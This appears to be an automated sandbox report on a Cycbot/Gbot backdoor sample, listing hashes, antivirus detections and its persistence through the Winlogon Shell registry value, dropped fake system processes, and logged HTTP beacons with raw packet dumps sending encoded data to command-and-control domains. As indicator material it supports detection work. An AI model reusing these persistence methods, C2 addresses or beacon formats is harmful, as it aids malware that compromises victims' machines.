Analysis Date2014-11-12 23:29:12
MD5c113761cc26775780567c521bda16fbc
SHA1ab2ea29de5082ed7622f1de420c02c5b3de9319a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: f416a155a728dfe20626414877fcd328 sha1: e4d767ad69fed5e21667edad7859241a2a420217 size: 117760
Section.rdata md5: 647d1eeb62e395f83be513b8d7124b5d sha1: 058fa364ad01ed54e503e973dea54ecdb22feaa6 size: 1024
Section.data md5: ad844ad79819da60f30c769b45511f73 sha1: 18e3de783d695b9e2c35eb99027efe788f0f65f4 size: 53760
Section.apexi md5: 440c6998960f7698146d54cb6d13d16f sha1: af405910f53ef6533982b65fdb77b09dda285302 size: 1024
Timestamp2005-11-10 11:39:12
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1502
PEhasha831dbf5c591f8233e5149ca70a5282098a83ad2
IMPhash49910ca797e2849f8f0f66f4a84e45c6
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-1963
AVDr. WebBackDoor.Gbot.32
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.MIA
AVFortinetW32/Gbot.B!tr.bdr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Win32/Heri
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanGen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSpdadatarestore.com
Winsock DNS127.0.0.1
Winsock DNSextremerollerclub.com
Winsock DNSnationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSnationsautoelectric.com
Type: A
98.139.135.198
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSextremerollerclub.com
Type: A
DNSpdadatarestore.com
Type: A
HTTP GEThttp://nationsautoelectric.com/images/50-217-1_F_1_.jpg?v78=85&tq=gKZEtzywlk9jNssB2s%2Ba%2BadB9C2AmZ9JuPxwxjhYR7vrg0UPA3kVINTzq050TySuTpJ1%2Bs2OSRlmZHZERqQ9LVJnR3EPLqJvk%2FraoeO6wNn8CODKzuL6ObGE62f6Wpozo7gJ3hxE1X9VhwaIsrb0bGS0sXTb8Y6koDvozfoUnZwZAWnlFILT4%2F1fwCmcFfEps%2Fghj96SQ4HwlnyLGtg%2Fuu4rPgjk4lQq8Y8aRmwm2fLDYMBh3EkgF6iBOZPaeTlPg1J9DAQ4i0C4jtePfyeeEM8J4U0o%2FQMAfASxCzlwbf24NxQ9IiWi1LMrU6Z1jFMlCeceWo03rJvsdBgT46VSegcQpyHpSZtmS5xsGHHzYaz6cEU54iiYIy0eAlFsT13rU5YDc3lOr5MMSj2YQD
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 98.139.135.198:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 35302d32   GET /images/50-2
0x00000010 (00016)   31372d31 5f465f31 5f2e6a70 673f7637   17-1_F_1_.jpg?v7
0x00000020 (00032)   383d3835 2674713d 674b5a45 747a7977   8=85&tq=gKZEtzyw
0x00000030 (00048)   6c6b396a 4e737342 32732532 42612532   lk9jNssB2s%2Ba%2
0x00000040 (00064)   42616442 39433241 6d5a394a 75507877   BadB9C2AmZ9JuPxw
0x00000050 (00080)   786a6859 52377672 67305550 41336b56   xjhYR7vrg0UPA3kV
0x00000060 (00096)   494e547a 71303530 54795375 54704a31   INTzq050TySuTpJ1
0x00000070 (00112)   25324273 324f5352 6c6d5a48 5a455271   %2Bs2OSRlmZHZERq
0x00000080 (00128)   51394c56 4a6e5233 45504c71 4a766b25   Q9LVJnR3EPLqJvk%
0x00000090 (00144)   32467261 6f654f36 774e6e38 434f444b   2FraoeO6wNn8CODK
0x000000a0 (00160)   7a754c36 4f624745 36326636 57706f7a   zuL6ObGE62f6Wpoz
0x000000b0 (00176)   6f37674a 33687845 31583956 68776149   o7gJ3hxE1X9VhwaI
0x000000c0 (00192)   73726230 62475330 73585462 3859366b   srb0bGS0sXTb8Y6k
0x000000d0 (00208)   6f44766f 7a666f55 6e5a775a 41576e6c   oDvozfoUnZwZAWnl
0x000000e0 (00224)   46494c54 34253246 31667743 6d634666   FILT4%2F1fwCmcFf
0x000000f0 (00240)   45707325 32466768 6a393653 51344877   Eps%2Fghj96SQ4Hw
0x00000100 (00256)   6c6e794c 47746725 32467575 34725067   lnyLGtg%2Fuu4rPg
0x00000110 (00272)   6a6b346c 51713859 3861526d 776d3266   jk4lQq8Y8aRmwm2f
0x00000120 (00288)   4c44594d 42683345 6b674636 69424f5a   LDYMBh3EkgF6iBOZ
0x00000130 (00304)   50616554 6c506731 4a394441 51346930   PaeTlPg1J9DAQ4i0
0x00000140 (00320)   43346a74 65506679 6565454d 384a3455   C4jtePfyeeEM8J4U
0x00000150 (00336)   306f2532 46514d41 66415378 437a6c77   0o%2FQMAfASxCzlw
0x00000160 (00352)   62663234 4e785139 49695769 314c4d72   bf24NxQ9IiWi1LMr
0x00000170 (00368)   55365a31 6a464d6c 43656365 576f3033   U6Z1jFMlCeceWo03
0x00000180 (00384)   724a7673 64426754 34365653 65676351   rJvsdBgT46VSegcQ
0x00000190 (00400)   70794870 535a746d 53357873 4748487a   pyHpSZtmS5xsGHHz
0x000001a0 (00416)   59617a36 63455535 34696959 49793065   Yaz6cEU54iiYIy0e
0x000001b0 (00432)   416c4673 54313372 55355944 63336c4f   AlFsT13rU5YDc3lO
0x000001c0 (00448)   72354d4d 536a3259 51442048 5454502f   r5MMSj2YQD HTTP/
0x000001d0 (00464)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x000001e0 (00480)   20636c6f 73650d0a 486f7374 3a206e61    close..Host: na
0x000001f0 (00496)   74696f6e 73617574 6f656c65 63747269   tionsautoelectri
0x00000200 (00512)   632e636f 6d0d0a41 63636570 743a202a   c.com..Accept: *
0x00000210 (00528)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000220 (00544)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e7a56 4b763937 35586c6d   X%2BSNzVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a41 66415378 437a6c77   ose....AfASxCzlw
0x00000160 (00352)   62663234 4e785139 49695769 314c4d72   bf24NxQ9IiWi1LMr
0x00000170 (00368)   55365a31 6a464d6c 43656365 576f3033   U6Z1jFMlCeceWo03
0x00000180 (00384)   724a7673 64426754 34365653 65676351   rJvsdBgT46VSegcQ
0x00000190 (00400)   70794870 535a746d 53357873 4748487a   pyHpSZtmS5xsGHHz
0x000001a0 (00416)   59617a36 63455535 34696959 49793065   Yaz6cEU54iiYIy0e
0x000001b0 (00432)   416c4673 54313372 55355944 63336c4f   AlFsT13rU5YDc3lO
0x000001c0 (00448)   72354d4d 536a3259 51442048 5454502f   r5MMSj2YQD HTTP/
0x000001d0 (00464)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x000001e0 (00480)   20636c6f 73650d0a 486f7374 3a206e61    close..Host: na
0x000001f0 (00496)   74696f6e 73617574 6f656c65 63747269   tionsautoelectri
0x00000200 (00512)   632e636f 6d0d0a41 63636570 743a202a   c.com..Accept: *
0x00000210 (00528)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000220 (00544)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a3e 0a20203c 6872202f 3e0a2020   ...>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a41 66415378 437a6c77   .......AfASxCzlw
0x00000160 (00352)   62663234 4e785139 49695769 314c4d72   bf24NxQ9IiWi1LMr
0x00000170 (00368)   55365a31 6a464d6c 43656365 576f3033   U6Z1jFMlCeceWo03
0x00000180 (00384)   724a7673 64426754 34365653 65676351   rJvsdBgT46VSegcQ
0x00000190 (00400)   70794870 535a746d 53357873 4748487a   pyHpSZtmS5xsGHHz
0x000001a0 (00416)   59617a36 63455535 34696959 49793065   Yaz6cEU54iiYIy0e
0x000001b0 (00432)   416c4673 54313372 55355944 63336c4f   AlFsT13rU5YDc3lO
0x000001c0 (00448)   72354d4d 536a3259 51442048 5454502f   r5MMSj2YQD HTTP/
0x000001d0 (00464)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x000001e0 (00480)   20636c6f 73650d0a 486f7374 3a206e61    close..Host: na
0x000001f0 (00496)   74696f6e 73617574 6f656c65 63747269   tionsautoelectri
0x00000200 (00512)   632e636f 6d0d0a41 63636570 743a202a   c.com..Accept: *
0x00000210 (00528)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000220 (00544)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a56 4b763937 35586c6d   X%2BSNzVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a745825 3242534e 78723579 676d3143   JtX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a663234 4e785139 49695769 314c4d72   .f24NxQ9IiWi1LMr
0x00000170 (00368)   55365a31 6a464d6c 43656365 576f3033   U6Z1jFMlCeceWo03
0x00000180 (00384)   724a7673 64426754 34365653 65676351   rJvsdBgT46VSegcQ
0x00000190 (00400)   70794870 535a746d 53357873 4748487a   pyHpSZtmS5xsGHHz
0x000001a0 (00416)   59617a36 63455535 34696959 49793065   Yaz6cEU54iiYIy0e
0x000001b0 (00432)   416c4673 54313372 55355944 63336c4f   AlFsT13rU5YDc3lO
0x000001c0 (00448)   72354d4d 536a3259 51442048 5454502f   r5MMSj2YQD HTTP/
0x000001d0 (00464)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x000001e0 (00480)   20636c6f 73650d0a 486f7374 3a206e61    close..Host: na
0x000001f0 (00496)   74696f6e 73617574 6f656c65 63747269   tionsautoelectri
0x00000200 (00512)   632e636f 6d0d0a41 63636570 743a202a   c.com..Accept: *
0x00000210 (00528)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000220 (00544)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....


Strings
Z...g....}...
y...s.
.{.{6..Uh.K
!
Y@1.3..r.
...b.T..N...S..9..HY..f.V...
.^.sT..Z
.5m;.T..
..
E
c
w.I..>.
q'L...@..39;i.+I...
=p..
}
..
.
.t
..P
B
00sSW
040904b0
1.0.0.3
1502
aFG"b
# @b
Bs0W
FileVersion
jjjjjj
PrivateBuild
ProductVersion
R"3 
StringFileInfo
SU!"
TIMES NEW ROMAN
Translation
UWPT
VarFileInfo
VS_VERSION_INFO
0iS0"Z
0TslTE
1<,VM<
2x[qu	
'3Q|#WFp
52m~n,3
5BuyGh>}
5;`I`_&G
5vb~_p
6$f:[o
6Rc'9w
#72,\G
7\%L5$
86zMKy
9,=m|}cA{
_9rbOW1
@;AlAj\
.apexi
B,kWtV
C*)cUY
CheckRemoteDebuggerPresent
Cm55, w<J t
Cpt:|V<
CreateWindowExW
_Cs!W:y@
@.data
d(L!e{B
DocumentPropertiesW
d(Z*k0
?e!C/X
EndDialog
EnumResourceTypesW
et>|~f
eu_x-^YX
e&$^Vb
 "^/F14
f2D{ %
fDq]HN
fs@@mYz
(%F%zG
]fZ[h 
)g.+3|
GetAncestor
GetFileType
GetStartupInfoA
GetWindowInfo
G(%/FMd
,gg)4o
g{S,QG
H(9:7C
hN&W({
\HVNS.
]HWk|.i?
:ianj2z3
Ic%0G(d
im)!1K
InitializeCriticalSection
j^3Ih-~
j\|4,Q
|jGtq^q5
;jzhiL
}!K5-@ 
[Kc :c
KERNEL32.dll
}kiL+z:u
K}Mi0:7
Kn}=lh
KpFFn&
$kt+4$~
K=UeFz
 l7>./P
L|8<o:A
`:L9a[
lM.O:Q
LoadCursorW
lQW,{A
lstrcpynW
.L;Z9lv17
M0?|vi;
MBm,fE_
mdhB:%Y
MessageBoxW
MH4dg|
'](MI4'U
MrX]#]k
Ng$a<s
nJI/jo
n]L8t0
%/n@r(B
Nv%uVYr
~%p`>#
P1zfc8>`
PoK*z5
Q@;:,c
qe7Q}/
qi2.B[
qL->Ce
qN=piN@
q@VaNP
qwMe(;
RCyc1L
`.rdata
RegisterClassExW
rGZG=U
RUt\.g2
RZJjQ	
S@^{:$\
SRLl>P
!SW4_b+lnu
T /b q
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TN*s=9z9
/(t(y9\9
@t\ZAp
tZ]~\ww
	>u9-f 	
^U++D1(
USER32.dll
UVaKTU
v7 #X-:F1
&.v	.bb3
V]E&V5
V;HYJd
&+v_l$n
vZV^UO
WINSPOOL.DRV
"=$W"k
}wxzd#c
	@X[1N
X{*>-2
X>|Agw
xZ(iy+
y#;acv
Yby7(Z
y.gm{[
YgY(l/
);y(h[
y[:IxI	
=yLx~@
/YWjBlq
}|^z.!
Z,:?eY
:`Z=+F
zlM0B0
z.uAm0
zZY'jq